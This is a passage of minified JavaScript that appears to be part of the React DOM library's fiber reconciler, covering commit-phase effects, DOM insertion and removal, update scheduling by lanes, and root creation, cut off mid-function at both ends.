15:case 22:if(null!==(t=null!==(t=n.updateQueue)?t.lastEffect:null)){e=t=t.next;do{if(3==(3&e.tag)){var a=e.create;e.destroy=a()}e=e.next}while(e!==t)}if(null!==(t=null!==(t=n.updateQueue)?t.lastEffect:null)){e=t=t.next;do{var r=e;a=r.next,0!=(4&(r=r.tag))&&0!=(1&r)&&(Ts(n,e),Hs(n,e)),e=a}while(e!==t)}return;case 1:return e=n.stateNode,4&n.flags&&(null===t?e.componentDidMount():(a=n.elementType===n.type?t.memoizedProps:Qr(n.type,t.memoizedProps),e.componentDidUpdate(a,t.memoizedState,e.__reactInternalSnapshotBeforeUpdate))),void(null!==(t=n.updateQueue)&&ho(n,t,e));case 3:if(null!==(t=n.updateQueue)){if(e=null,null!==n.child)switch(n.child.tag){case 5:case 1:e=n.child.stateNode}ho(n,t,e)}return;case 5:return e=n.stateNode,void(null===t&&4&n.flags&&Da(n.type,n.memoizedProps)&&e.focus());case 6:case 4:case 12:case 19:case 17:case 20:case 21:case 23:case 24:return;case 13:return void(null===n.memoizedState&&(n=n.alternate,null!==n&&(n=n.memoizedState,null!==n&&(n=n.dehydrated,null!==n&&xt(n)))))}throw Error(i(163))}function vl(e,t){for(var n=e;;){if(5===n.tag){var a=n.stateNode;if(t)"function"==typeof(a=a.style).setProperty?a.setProperty("display","none","important"):a.display="none";else{a=n.stateNode;var r=n.memoizedProps.style;r=null!=r&&r.hasOwnProperty("display")?r.display:null,a.style.display=be("display",r)}}else if(6===n.tag)n.stateNode.nodeValue=t?"":n.memoizedProps;else if((23!==n.tag&&24!==n.tag||null===n.memoizedState||n===e)&&null!==n.child){n.child.return=n,n=n.child;continue}if(n===e)break;for(;null===n.sibling;){if(null===n.return||n.return===e)return;n=n.return}n.sibling.return=n.return,n=n.sibling}}function _l(e,t){if(Er&&"function"==typeof Er.onCommitFiberUnmount)try{Er.onCommitFiberUnmount(kr,t)}catch(e){}switch(t.tag){case 0:case 11:case 14:case 15:case 22:if(null!==(e=t.updateQueue)&&null!==(e=e.lastEffect)){var n=e=e.next;do{var a=n,r=a.destroy;if(a=a.tag,void 0!==r)if(0!=(4&a))Ts(t,n);else{a=t;try{r()}catch(e){js(a,e)}}n=n.next}while(n!==e)}break;case 1:if(fl(t),"function"==typeof(e=t.stateNode).componentWillUnmount)try{e.props=t.memoizedProps,e.state=t.memoizedState,e.componentWillUnmount()}catch(e){js(t,e)}break;case 5:fl(t);break;case 4:El(e,t)}}function wl(e){e.alternate=null,e.child=null,e.dependencies=null,e.firstEffect=null,e.lastEffect=null,e.memoizedProps=null,e.memoizedState=null,e.pendingProps=null,e.return=null,e.updateQueue=null}function bl(e){return 5===e.tag||3===e.tag||4===e.tag}function xl(e){e:{for(var t=e.return;null!==t;){if(bl(t))break e;t=t.return}throw Error(i(160))}var n=t;switch(t=n.stateNode,n.tag){case 5:var a=!1;break;case 3:case 4:t=t.containerInfo,a=!0;break;default:throw Error(i(161))}16&n.flags&&(ve(t,""),n.flags&=-17);e:t:for(n=e;;){for(;null===n.sibling;){if(null===n.return||bl(n.return)){n=null;break e}n=n.return}for(n.sibling.return=n.return,n=n.sibling;5!==n.tag&&6!==n.tag&&18!==n.tag;){if(2&n.flags)continue t;if(null===n.child||4===n.tag)continue t;n.child.return=n,n=n.child}if(!(2&n.flags)){n=n.stateNode;break e}}a?yl(e,n,t):kl(e,n,t)}function yl(e,t,n){var a=e.tag,r=5===a||6===a;if(r)e=r?e.stateNode:e.stateNode.instance,t?8===n.nodeType?n.parentNode.insertBefore(e,t):n.insertBefore(e,t):(8===n.nodeType?(t=n.parentNode).insertBefore(e,n):(t=n).appendChild(e),null!=(n=n._reactRootContainer)||null!==t.onclick||(t.onclick=Va));else if(4!==a&&null!==(e=e.child))for(yl(e,t,n),e=e.sibling;null!==e;)yl(e,t,n),e=e.sibling}function kl(e,t,n){var a=e.tag,r=5===a||6===a;if(r)e=r?e.stateNode:e.stateNode.instance,t?n.insertBefore(e,t):n.appendChild(e);else if(4!==a&&null!==(e=e.child))for(kl(e,t,n),e=e.sibling;null!==e;)kl(e,t,n),e=e.sibling}function El(e,t){for(var n,a,r=t,o=!1;;){if(!o){o=r.return;e:for(;;){if(null===o)throw Error(i(160));switch(n=o.stateNode,o.tag){case 5:a=!1;break e;case 3:case 4:n=n.containerInfo,a=!0;break e}o=o.return}o=!0}if(5===r.tag||6===r.tag){e:for(var l=e,s=r,p=s;;)if(_l(l,p),null!==p.child&&4!==p.tag)p.child.return=p,p=p.child;else{if(p===s)break e;for(;null===p.sibling;){if(null===p.return||p.return===s)break e;p=p.return}p.sibling.return=p.return,p=p.sibling}a?(l=n,s=r.stateNode,8===l.nodeType?l.parentNode.removeChild(s):l.removeChild(s)):n.removeChild(r.stateNode)}else if(4===r.tag){if(null!==r.child){n=r.stateNode.containerInfo,a=!0,r.child.return=r,r=r.child;continue}}else if(_l(e,r),null!==r.child){r.child.return=r,r=r.child;continue}if(r===t)break;for(;null===r.sibling;){if(null===r.return||r.return===t)return;4===(r=r.return).tag&&(o=!1)}r.sibling.return=r.return,r=r.sibling}}function Cl(e,t){switch(t.tag){case 0:case 11:case 14:case 15:case 22:var n=t.updateQueue;if(null!==(n=null!==n?n.lastEffect:null)){var a=n=n.next;do{3==(3&a.tag)&&(e=a.destroy,a.destroy=void 0,void 0!==e&&e()),a=a.next}while(a!==n)}return;case 1:case 12:case 17:return;case 5:if(null!=(n=t.stateNode)){a=t.memoizedProps;var r=null!==e?e.memoizedProps:a;e=t.type;var o=t.updateQueue;if(t.updateQueue=null,null!==o){for(n[Ya]=a,"input"===e&&"radio"===a.type&&null!=a.name&&te(n,a),Ee(e,r),t=Ee(e,a),r=0;r<o.length;r+=2){var l=o[r],s=o[r+1];"style"===l?xe(n,s):"dangerouslySetInnerHTML"===l?ge(n,s):"children"===l?ve(n,s):b(n,l,s,t)}switch(e){case"input":ne(n,a);break;case"textarea":pe(n,a);break;case"select":e=n._wrapperState.wasMultiple,n._wrapperState.wasMultiple=!!a.multiple,null!=(o=a.value)?ie(n,!!a.multiple,o,!1):e!==!!a.multiple&&(null!=a.defaultValue?ie(n,!!a.multiple,a.defaultValue,!0):ie(n,!!a.multiple,a.multiple?[]:"",!1))}}}return;case 6:if(null===t.stateNode)throw Error(i(162));return void(t.stateNode.nodeValue=t.memoizedProps);case 3:return void((n=t.stateNode).hydrate&&(n.hydrate=!1,xt(n.containerInfo)));case 13:return null!==t.memoizedState&&(Il=Dr(),vl(t.child,!0)),void Sl(t);case 19:return void Sl(t);case 23:case 24:return void vl(t,null!==t.memoizedState)}throw Error(i(163))}function Sl(e){var t=e.updateQueue;if(null!==t){e.updateQueue=null;var n=e.stateNode;null===n&&(n=e.stateNode=new ml),t.forEach((function(t){var a=Fs.bind(null,e,t);n.has(t)||(n.add(t),t.then(a,a))}))}}function Ml(e,t){return null!==e&&(null===(e=e.memoizedState)||null!==e.dehydrated)&&null!==(t=t.memoizedState)&&null===t.dehydrated}var Ll=Math.ceil,Nl=x.ReactCurrentDispatcher,Zl=x.ReactCurrentOwner,Pl=0,zl=null,Al=null,Bl=0,Hl=0,Tl=pr(0),Rl=0,Ol=null,jl=0,Vl=0,Fl=0,Wl=0,Dl=null,Il=0,Ul=1/0;function $l(){Ul=Dr()+500}var Gl,ql=null,Kl=!1,Xl=null,Ql=null,Jl=!1,Yl=null,es=90,ts=[],ns=[],as=null,rs=0,os=null,is=-1,ls=0,ss=0,ps=null,cs=!1;function ds(){return 0!=(48&Pl)?Dr():-1!==is?is:is=Dr()}function us(e){if(0==(2&(e=e.mode)))return 1;if(0==(4&e))return 99===Ir()?1:2;if(0===ls&&(ls=jl),0!==Xr.transition){0!==ss&&(ss=null!==Dl?Dl.pendingLanes:0),e=ls;var t=4186112&~ss;return 0==(t&=-t)&&0==(t=(e=4186112&~e)&-e)&&(t=8192),t}return e=Ir(),e=jt(0!=(4&Pl)&&98===e?12:e=function(e){switch(e){case 99:return 15;case 98:return 10;case 97:case 96:return 8;case 95:return 2;default:return 0}}(e),ls)}function ms(e,t,n){if(50<rs)throw rs=0,os=null,Error(i(185));if(null===(e=fs(e,t)))return null;Wt(e,t,n),e===zl&&(Fl|=t,4===Rl&&vs(e,Bl));var a=Ir();1===t?0!=(8&Pl)&&0==(48&Pl)?_s(e):(hs(e,n),0===Pl&&($l(),qr())):(0==(4&Pl)||98!==a&&99!==a||(null===as?as=new Set([e]):as.add(e)),hs(e,n)),Dl=e}function fs(e,t){e.lanes|=t;var n=e.alternate;for(null!==n&&(n.lanes|=t),n=e,e=e.return;null!==e;)e.childLanes|=t,null!==(n=e.alternate)&&(n.childLanes|=t),n=e,e=e.return;return 3===n.tag?n.stateNode:null}function hs(e,t){for(var n=e.callbackNode,a=e.suspendedLanes,r=e.pingedLanes,o=e.expirationTimes,l=e.pendingLanes;0<l;){var s=31-Dt(l),p=1<<s,c=o[s];if(-1===c){if(0==(p&a)||0!=(p&r)){c=t,Tt(p);var d=Ht;o[s]=10<=d?c+250:6<=d?c+5e3:-1}}else c<=t&&(e.expiredLanes|=p);l&=~p}if(a=Rt(e,e===zl?Bl:0),t=Ht,0===a)null!==n&&(n!==Rr&&Mr(n),e.callbackNode=null,e.callbackPriority=0);else{if(null!==n){if(e.callbackPriority===t)return;n!==Rr&&Mr(n)}15===t?(n=_s.bind(null,e),null===jr?(jr=[n],Vr=Sr(zr,Kr)):jr.push(n),n=Rr):14===t?n=Gr(99,_s.bind(null,e)):(n=function(e){switch(e){case 15:case 14:return 99;case 13:case 12:case 11:case 10:return 98;case 9:case 8:case 7:case 6:case 4:case 5:return 97;case 3:case 2:case 1:return 95;case 0:return 90;default:throw Error(i(358,e))}}(t),n=Gr(n,gs.bind(null,e))),e.callbackPriority=t,e.callbackNode=n}}function gs(e){if(is=-1,ss=ls=0,0!=(48&Pl))throw Error(i(327));var t=e.callbackNode;if(Bs()&&e.callbackNode!==t)return null;var n=Rt(e,e===zl?Bl:0);if(0===n)return null;var a=n,r=Pl;Pl|=16;var o=Cs();for(zl===e&&Bl===a||($l(),ks(e,a));;)try{Ls();break}catch(t){Es(e,t)}if(no(),Nl.current=o,Pl=r,null!==Al?a=0:(zl=null,Bl=0,a=Rl),0!=(jl&Fl))ks(e,0);else if(0!==a){if(2===a&&(Pl|=64,e.hydrate&&(e.hydrate=!1,Ga(e.containerInfo)),0!==(n=Ot(e))&&(a=Ss(e,n))),1===a)throw t=Ol,ks(e,0),vs(e,n),hs(e,Dr()),t;switch(e.finishedWork=e.current.alternate,e.finishedLanes=n,a){case 0:case 1:throw Error(i(345));case 2:case 5:Ps(e);break;case 3:if(vs(e,n),(62914560&n)===n&&10<(a=Il+500-Dr())){if(0!==Rt(e,0))break;if(((r=e.suspendedLanes)&n)!==n){ds(),e.pingedLanes|=e.suspendedLanes&r;break}e.timeoutHandle=Ua(Ps.bind(null,e),a);break}Ps(e);break;case 4:if(vs(e,n),(4186112&n)===n)break;for(a=e.eventTimes,r=-1;0<n;){var l=31-Dt(n);o=1<<l,(l=a[l])>r&&(r=l),n&=~o}if(n=r,10<(n=(120>(n=Dr()-n)?120:480>n?480:1080>n?1080:1920>n?1920:3e3>n?3e3:4320>n?4320:1960*Ll(n/1960))-n)){e.timeoutHandle=Ua(Ps.bind(null,e),n);break}Ps(e);break;default:throw Error(i(329))}}return hs(e,Dr()),e.callbackNode===t?gs.bind(null,e):null}function vs(e,t){for(t&=~Wl,t&=~Fl,e.suspendedLanes|=t,e.pingedLanes&=~t,e=e.expirationTimes;0<t;){var n=31-Dt(t),a=1<<n;e[n]=-1,t&=~a}}function _s(e){if(0!=(48&Pl))throw Error(i(327));if(Bs(),e===zl&&0!=(e.expiredLanes&Bl)){var t=Bl,n=Ss(e,t);0!=(jl&Fl)&&(n=Ss(e,t=Rt(e,t)))}else n=Ss(e,t=Rt(e,0));if(0!==e.tag&&2===n&&(Pl|=64,e.hydrate&&(e.hydrate=!1,Ga(e.containerInfo)),0!==(t=Ot(e))&&(n=Ss(e,t))),1===n)throw n=Ol,ks(e,0),vs(e,t),hs(e,Dr()),n;return e.finishedWork=e.current.alternate,e.finishedLanes=t,Ps(e),hs(e,Dr()),null}function ws(e,t){var n=Pl;Pl|=1;try{return e(t)}finally{0===(Pl=n)&&($l(),qr())}}function bs(e,t){var n=Pl;Pl&=-2,Pl|=8;try{return e(t)}finally{0===(Pl=n)&&($l(),qr())}}function xs(e,t){dr(Tl,Hl),Hl|=t,jl|=t}function ys(){Hl=Tl.current,cr(Tl)}function ks(e,t){e.finishedWork=null,e.finishedLanes=0;var n=e.timeoutHandle;if(-1!==n&&(e.timeoutHandle=-1,$a(n)),null!==Al)for(n=Al.return;null!==n;){var a=n;switch(a.tag){case 1:null!=(a=a.type.childContextTypes)&&_r();break;case 3:Ho(),cr(fr),cr(mr),Xo();break;case 5:Ro(a);break;case 4:Ho();break;case 13:case 19:cr(Oo);break;case 10:ao(a);break;case 23:case 24:ys()}n=n.return}zl=e,Al=Us(e.current,null),Bl=Hl=jl=t,Rl=0,Ol=null,Wl=Fl=Vl=0}function Es(e,t){for(;;){var n=Al;try{if(no(),Qo.current=zi,ai){for(var a=ei.memoizedState;null!==a;){var r=a.queue;null!==r&&(r.pending=null),a=a.next}ai=!1}if(Yo=0,ni=ti=ei=null,ri=!1,Zl.current=null,null===n||null===n.return){Rl=1,Ol=t,Al=null;break}e:{var o=e,i=n.return,l=n,s=t;if(t=Bl,l.flags|=2048,l.firstEffect=l.lastEffect=null,null!==s&&"object"==typeof s&&"function"==typeof s.then){var p=s;if(0==(2&l.mode)){var c=l.alternate;c?(l.updateQueue=c.updateQueue,l.memoizedState=c.memoizedState,l.lanes=c.lanes):(l.updateQueue=null,l.memoizedState=null)}var d=0!=(1&Oo.current),u=i;do{var m;if(m=13===u.tag){var f=u.memoizedState;if(null!==f)m=null!==f.dehydrated;else{var h=u.memoizedProps;m=void 0!==h.fallback&&(!0!==h.unstable_avoidThisFallback||!d)}}if(m){var g=u.updateQueue;if(null===g){var v=new Set;v.add(p),u.updateQueue=v}else g.add(p);if(0==(2&u.mode)){if(u.flags|=64,l.flags|=16384,l.flags&=-2981,1===l.tag)if(null===l.alternate)l.tag=17;else{var _=co(-1,1);_.tag=2,uo(l,_)}l.lanes|=1;break e}s=void 0,l=t;var w=o.pingCache;if(null===w?(w=o.pingCache=new cl,s=new Set,w.set(p,s)):void 0===(s=w.get(p))&&(s=new Set,w.set(p,s)),!s.has(l)){s.add(l);var b=Vs.bind(null,o,p,l);p.then(b,b)}u.flags|=4096,u.lanes=t;break e}u=u.return}while(null!==u);s=Error((G(l.type)||"A React component")+" suspended while rendering, but no fallback UI was specified.\n\nAdd a <Suspense fallback=...> component higher in the tree to provide a loading indicator or placeholder to display.")}5!==Rl&&(Rl=2),s=sl(s,l),u=i;do{switch(u.tag){case 3:o=s,u.flags|=4096,t&=-t,u.lanes|=t,mo(u,dl(0,o,t));break e;case 1:o=s;var x=u.type,y=u.stateNode;if(0==(64&u.flags)&&("function"==typeof x.getDerivedStateFromError||null!==y&&"function"==typeof y.componentDidCatch&&(null===Ql||!Ql.has(y)))){u.flags|=4096,t&=-t,u.lanes|=t,mo(u,ul(u,o,t));break e}}u=u.return}while(null!==u)}Zs(n)}catch(e){t=e,Al===n&&null!==n&&(Al=n=n.return);continue}break}}function Cs(){var e=Nl.current;return Nl.current=zi,null===e?zi:e}function Ss(e,t){var n=Pl;Pl|=16;var a=Cs();for(zl===e&&Bl===t||ks(e,t);;)try{Ms();break}catch(t){Es(e,t)}if(no(),Pl=n,Nl.current=a,null!==Al)throw Error(i(261));return zl=null,Bl=0,Rl}function Ms(){for(;null!==Al;)Ns(Al)}function Ls(){for(;null!==Al&&!Lr();)Ns(Al)}function Ns(e){var t=Gl(e.alternate,e,Hl);e.memoizedProps=e.pendingProps,null===t?Zs(e):Al=t,Zl.current=null}function Zs(e){var t=e;do{var n=t.alternate;if(e=t.return,0==(2048&t.flags)){if(null!==(n=il(n,t,Hl)))return void(Al=n);if(24!==(n=t).tag&&23!==n.tag||null===n.memoizedState||0!=(1073741824&Hl)||0==(4&n.mode)){for(var a=0,r=n.child;null!==r;)a|=r.lanes|r.childLanes,r=r.sibling;n.childLanes=a}null!==e&&0==(2048&e.flags)&&(null===e.firstEffect&&(e.firstEffect=t.firstEffect),null!==t.lastEffect&&(null!==e.lastEffect&&(e.lastEffect.nextEffect=t.firstEffect),e.lastEffect=t.lastEffect),1<t.flags&&(null!==e.lastEffect?e.lastEffect.nextEffect=t:e.firstEffect=t,e.lastEffect=t))}else{if(null!==(n=ll(t)))return n.flags&=2047,void(Al=n);null!==e&&(e.firstEffect=e.lastEffect=null,e.flags|=2048)}if(null!==(t=t.sibling))return void(Al=t);Al=t=e}while(null!==t);0===Rl&&(Rl=5)}function Ps(e){var t=Ir();return $r(99,zs.bind(null,e,t)),null}function zs(e,t){do{Bs()}while(null!==Yl);if(0!=(48&Pl))throw Error(i(327));var n=e.finishedWork;if(null===n)return null;if(e.finishedWork=null,e.finishedLanes=0,n===e.current)throw Error(i(177));e.callbackNode=null;var a=n.lanes|n.childLanes,r=a,o=e.pendingLanes&~r;e.pendingLanes=r,e.suspendedLanes=0,e.pingedLanes=0,e.expiredLanes&=r,e.mutableReadLanes&=r,e.entangledLanes&=r,r=e.entanglements;for(var l=e.eventTimes,s=e.expirationTimes;0<o;){var p=31-Dt(o),c=1<<p;r[p]=0,l[p]=-1,s[p]=-1,o&=~c}if(null!==as&&0==(24&a)&&as.has(e)&&as.delete(e),e===zl&&(Al=zl=null,Bl=0),1<n.flags?null!==n.lastEffect?(n.lastEffect.nextEffect=n,a=n.firstEffect):a=n:a=n.firstEffect,null!==a){if(r=Pl,Pl|=32,Zl.current=null,Fa=qt,va(l=ga())){if("selectionStart"in l)s={start:l.selectionStart,end:l.selectionEnd};else e:if(s=(s=l.ownerDocument)&&s.defaultView||window,(c=s.getSelection&&s.getSelection())&&0!==c.rangeCount){s=c.anchorNode,o=c.anchorOffset,p=c.focusNode,c=c.focusOffset;try{s.nodeType,p.nodeType}catch(e){s=null;break e}var d=0,u=-1,m=-1,f=0,h=0,g=l,v=null;t:for(;;){for(var _;g!==s||0!==o&&3!==g.nodeType||(u=d+o),g!==p||0!==c&&3!==g.nodeType||(m=d+c),3===g.nodeType&&(d+=g.nodeValue.length),null!==(_=g.firstChild);)v=g,g=_;for(;;){if(g===l)break t;if(v===s&&++f===o&&(u=d),v===p&&++h===c&&(m=d),null!==(_=g.nextSibling))break;v=(g=v).parentNode}g=_}s=-1===u||-1===m?null:{start:u,end:m}}else s=null;s=s||{start:0,end:0}}else s=null;Wa={focusedElem:l,selectionRange:s},qt=!1,ps=null,cs=!1,ql=a;do{try{As()}catch(e){if(null===ql)throw Error(i(330));js(ql,e),ql=ql.nextEffect}}while(null!==ql);ps=null,ql=a;do{try{for(l=e;null!==ql;){var w=ql.flags;if(16&w&&ve(ql.stateNode,""),128&w){var b=ql.alternate;if(null!==b){var x=b.ref;null!==x&&("function"==typeof x?x(null):x.current=null)}}switch(1038&w){case 2:xl(ql),ql.flags&=-3;break;case 6:xl(ql),ql.flags&=-3,Cl(ql.alternate,ql);break;case 1024:ql.flags&=-1025;break;case 1028:ql.flags&=-1025,Cl(ql.alternate,ql);break;case 4:Cl(ql.alternate,ql);break;case 8:El(l,s=ql);var y=s.alternate;wl(s),null!==y&&wl(y)}ql=ql.nextEffect}}catch(e){if(null===ql)throw Error(i(330));js(ql,e),ql=ql.nextEffect}}while(null!==ql);if(x=Wa,b=ga(),w=x.focusedElem,l=x.selectionRange,b!==w&&w&&w.ownerDocument&&ha(w.ownerDocument.documentElement,w)){null!==l&&va(w)&&(b=l.start,void 0===(x=l.end)&&(x=b),"selectionStart"in w?(w.selectionStart=b,w.selectionEnd=Math.min(x,w.value.length)):(x=(b=w.ownerDocument||document)&&b.defaultView||window).getSelection&&(x=x.getSelection(),s=w.textContent.length,y=Math.min(l.start,s),l=void 0===l.end?y:Math.min(l.end,s),!x.extend&&y>l&&(s=l,l=y,y=s),s=fa(w,y),o=fa(w,l),s&&o&&(1!==x.rangeCount||x.anchorNode!==s.node||x.anchorOffset!==s.offset||x.focusNode!==o.node||x.focusOffset!==o.offset)&&((b=b.createRange()).setStart(s.node,s.offset),x.removeAllRanges(),y>l?(x.addRange(b),x.extend(o.node,o.offset)):(b.setEnd(o.node,o.offset),x.addRange(b))))),b=[];for(x=w;x=x.parentNode;)1===x.nodeType&&b.push({element:x,left:x.scrollLeft,top:x.scrollTop});for("function"==typeof w.focus&&w.focus(),w=0;w<b.length;w++)(x=b[w]).element.scrollLeft=x.left,x.element.scrollTop=x.top}qt=!!Fa,Wa=Fa=null,e.current=n,ql=a;do{try{for(w=e;null!==ql;){var k=ql.flags;if(36&k&&gl(w,ql.alternate,ql),128&k){b=void 0;var E=ql.ref;if(null!==E){var C=ql.stateNode;ql.tag,b=C,"function"==typeof E?E(b):E.current=b}}ql=ql.nextEffect}}catch(e){if(null===ql)throw Error(i(330));js(ql,e),ql=ql.nextEffect}}while(null!==ql);ql=null,Or(),Pl=r}else e.current=n;if(Jl)Jl=!1,Yl=e,es=t;else for(ql=a;null!==ql;)t=ql.nextEffect,ql.nextEffect=null,8&ql.flags&&((k=ql).sibling=null,k.stateNode=null),ql=t;if(0===(a=e.pendingLanes)&&(Ql=null),1===a?e===os?rs++:(rs=0,os=e):rs=0,n=n.stateNode,Er&&"function"==typeof Er.onCommitFiberRoot)try{Er.onCommitFiberRoot(kr,n,void 0,64==(64&n.current.flags))}catch(e){}if(hs(e,Dr()),Kl)throw Kl=!1,e=Xl,Xl=null,e;return 0!=(8&Pl)||qr(),null}function As(){for(;null!==ql;){var e=ql.alternate;cs||null===ps||(0!=(8&ql.flags)?Ye(ql,ps)&&(cs=!0):13===ql.tag&&Ml(e,ql)&&Ye(ql,ps)&&(cs=!0));var t=ql.flags;0!=(256&t)&&hl(e,ql),0==(512&t)||Jl||(Jl=!0,Gr(97,(function(){return Bs(),null}))),ql=ql.nextEffect}}function Bs(){if(90!==es){var e=97<es?97:es;return es=90,$r(e,Rs)}return!1}function Hs(e,t){ts.push(t,e),Jl||(Jl=!0,Gr(97,(function(){return Bs(),null})))}function Ts(e,t){ns.push(t,e),Jl||(Jl=!0,Gr(97,(function(){return Bs(),null})))}function Rs(){if(null===Yl)return!1;var e=Yl;if(Yl=null,0!=(48&Pl))throw Error(i(331));var t=Pl;Pl|=32;var n=ns;ns=[];for(var a=0;a<n.length;a+=2){var r=n[a],o=n[a+1],l=r.destroy;if(r.destroy=void 0,"function"==typeof l)try{l()}catch(e){if(null===o)throw Error(i(330));js(o,e)}}for(n=ts,ts=[],a=0;a<n.length;a+=2){r=n[a],o=n[a+1];try{var s=r.create;r.destroy=s()}catch(e){if(null===o)throw Error(i(330));js(o,e)}}for(s=e.current.firstEffect;null!==s;)e=s.nextEffect,s.nextEffect=null,8&s.flags&&(s.sibling=null,s.stateNode=null),s=e;return Pl=t,qr(),!0}function Os(e,t,n){uo(e,t=dl(0,t=sl(n,t),1)),t=ds(),null!==(e=fs(e,1))&&(Wt(e,1,t),hs(e,t))}function js(e,t){if(3===e.tag)Os(e,e,t);else for(var n=e.return;null!==n;){if(3===n.tag){Os(n,e,t);break}if(1===n.tag){var a=n.stateNode;if("function"==typeof n.type.getDerivedStateFromError||"function"==typeof a.componentDidCatch&&(null===Ql||!Ql.has(a))){var r=ul(n,e=sl(t,e),1);if(uo(n,r),r=ds(),null!==(n=fs(n,1)))Wt(n,1,r),hs(n,r);else if("function"==typeof a.componentDidCatch&&(null===Ql||!Ql.has(a)))try{a.componentDidCatch(t,e)}catch(e){}break}}n=n.return}}function Vs(e,t,n){var a=e.pingCache;null!==a&&a.delete(t),t=ds(),e.pingedLanes|=e.suspendedLanes&n,zl===e&&(Bl&n)===n&&(4===Rl||3===Rl&&(62914560&Bl)===Bl&&500>Dr()-Il?ks(e,0):Wl|=n),hs(e,t)}function Fs(e,t){var n=e.stateNode;null!==n&&n.delete(t),0==(t=0)&&(0==(2&(t=e.mode))?t=1:0==(4&t)?t=99===Ir()?1:2:(0===ls&&(ls=jl),0===(t=Vt(62914560&~ls))&&(t=4194304))),n=ds(),null!==(e=fs(e,t))&&(Wt(e,t,n),hs(e,n))}function Ws(e,t,n,a){this.tag=e,this.key=n,this.sibling=this.child=this.return=this.stateNode=this.type=this.elementType=null,this.index=0,this.ref=null,this.pendingProps=t,this.dependencies=this.memoizedState=this.updateQueue=this.memoizedProps=null,this.mode=a,this.flags=0,this.lastEffect=this.firstEffect=this.nextEffect=null,this.childLanes=this.lanes=0,this.alternate=null}function Ds(e,t,n,a){return new Ws(e,t,n,a)}function Is(e){return!(!(e=e.prototype)||!e.isReactComponent)}function Us(e,t){var n=e.alternate;return null===n?((n=Ds(e.tag,t,e.key,e.mode)).elementType=e.elementType,n.type=e.type,n.stateNode=e.stateNode,n.alternate=e,e.alternate=n):(n.pendingProps=t,n.type=e.type,n.flags=0,n.nextEffect=null,n.firstEffect=null,n.lastEffect=null),n.childLanes=e.childLanes,n.lanes=e.lanes,n.child=e.child,n.memoizedProps=e.memoizedProps,n.memoizedState=e.memoizedState,n.updateQueue=e.updateQueue,t=e.dependencies,n.dependencies=null===t?null:{lanes:t.lanes,firstContext:t.firstContext},n.sibling=e.sibling,n.index=e.index,n.ref=e.ref,n}function $s(e,t,n,a,r,o){var l=2;if(a=e,"function"==typeof e)Is(e)&&(l=1);else if("string"==typeof e)l=5;else e:switch(e){case E:return Gs(n.children,r,o,t);case T:l=8,r|=16;break;case C:l=8,r|=1;break;case S:return(e=Ds(12,n,t,8|r)).elementType=S,e.type=S,e.lanes=o,e;case Z:return(e=Ds(13,n,t,r)).type=Z,e.elementType=Z,e.lanes=o,e;case P:return(e=Ds(19,n,t,r)).elementType=P,e.lanes=o,e;case R:return qs(n,r,o,t);case O:return(e=Ds(24,n,t,r)).elementType=O,e.lanes=o,e;default:if("object"==typeof e&&null!==e)switch(e.$$typeof){case M:l=10;break e;case L:l=9;break e;case N:l=11;break e;case z:l=14;break e;case A:l=16,a=null;break e;case B:l=22;break e}throw Error(i(130,null==e?e:typeof e,""))}return(t=Ds(l,n,t,r)).elementType=e,t.type=a,t.lanes=o,t}function Gs(e,t,n,a){return(e=Ds(7,e,a,t)).lanes=n,e}function qs(e,t,n,a){return(e=Ds(23,e,a,t)).elementType=R,e.lanes=n,e}function Ks(e,t,n){return(e=Ds(6,e,null,t)).lanes=n,e}function Xs(e,t,n){return(t=Ds(4,null!==e.children?e.children:[],e.key,t)).lanes=n,t.stateNode={containerInfo:e.containerInfo,pendingChildren:null,implementation:e.implementation},t}function Qs(e,t,n){this.tag=t,this.containerInfo=e,this.finishedWork=this.pingCache=this.current=this.pendingChildren=null,this.timeoutHandle=-1,this.pendingContext=this.context=null,this.hydrate=n,this.callbackNode=null,this.callbackPriority=0,this.eventTimes=Ft(0),this.expirationTimes=Ft(-1),this.entangledLanes=this.finishedLanes=this.mutableReadLanes=this.expiredLanes=this.pingedLanes=this.suspendedLanes=this.pendingLanes=0,this.entanglements=Ft(0),this.mutableSourceEagerHydrationData=null}function Js(e,t,n,a){var r=t.current,o=ds(),l=us(r);e:if(n){t:{if(Ke(n=n._reactInternals)!==n||1!==n.tag)throw Error(i(170));var s=n;do{switch(s.tag){case 3:s=s.stateNode.context;break t;case 1:if(vr(s.type)){s=s.stateNode.__reactInternalMemoizedMergedChildContext;break t}}s=s.return}while(null!==s);throw Error(i(171))}if(1===n.tag){var p=n.type;if(vr(p)){n=br(n,p,s);break e}}n=s}else n=ur;return null===t.context?t.context=n:t.pendingContext=n,(t=co(o,l)).payload={element:e},null!==(a=void 0===a?null:a)&&(t.callback=a),uo(r,t),ms(r,l,o),l}function Ys(e){return(e=e.current).child?(e.child.tag,e.child.stateNode):null}function ep(e,t){if(null!==(e=e.memoizedState)&&null!==e.dehydrated){var n=e.retryLane;e.retryLane=0!==n&&n<t?n:t}}function tp(e,t){ep(e,t),(e=e.alternate)&&ep(e,t)}function np(e,t,n){var a=null!=n&&null!=n.hydrationOptions&&n.hydrationOptions.mutableSources||null;if(n=new Qs(e,t,null!=n&&!0===n.hydrate),t=Ds(3,null,null,2===t?7:1===t?3:0),n.current=t,t.stateNode=n,so(t),e[er]=n.current,za(8===e.nodeType?e.parentNode:e),a)for(e=0;e<a.length;e++){var r=(t=a[e])._getVersion;r=r(t._source),null==n.mutableSourceEagerHydrationData?n.mutableSourceEagerHydrationData=[t,r]:n.mutableSourceEagerHydrationData.push(t,r)}this._internalRoot=n}function ap(e){return!(!e||1!==e.nodeType&&9!==e.nodeType&&11!==e.nodeType&&(8!==e.nodeType||" react-mount-point-unstable "!==e.nodeValue))}function rp(e,t,n,a,r){var o=n._reactRootContainer;if(o){var i=o._internalRoot;if("function"==typeof r){var l=r;r=function(){var e=Ys(i);l.call(e)}}Js(t,i,e,r)}else{if(o=n._reactRootContainer=function(e,t){if(t||(t=!(!(t=e?9===e.nodeType?e.documentElement:e.firstChild:null)||1!==t.nodeType||!t.hasAttribute("data-reactroot"))),!t)for(var n;n=e.lastChild;)e.removeChild(n);return new np(e,0,t?{hydrate:!0}:void 0)}(n,a),i=o._internalRoot,"function"==typeof r){var s=r;r=function(){var e=Ys(i);s.call(e)}}bs((function(){Js(t,i,e,r)}))}return Ys(i)}function op(e,t){var n=2<arguments.length&&void 0!==arguments[2]?arguments[2]:null;if(!ap(t))throw Error(i(200));return function(e,t,n){var a=3<arguments.length&&void 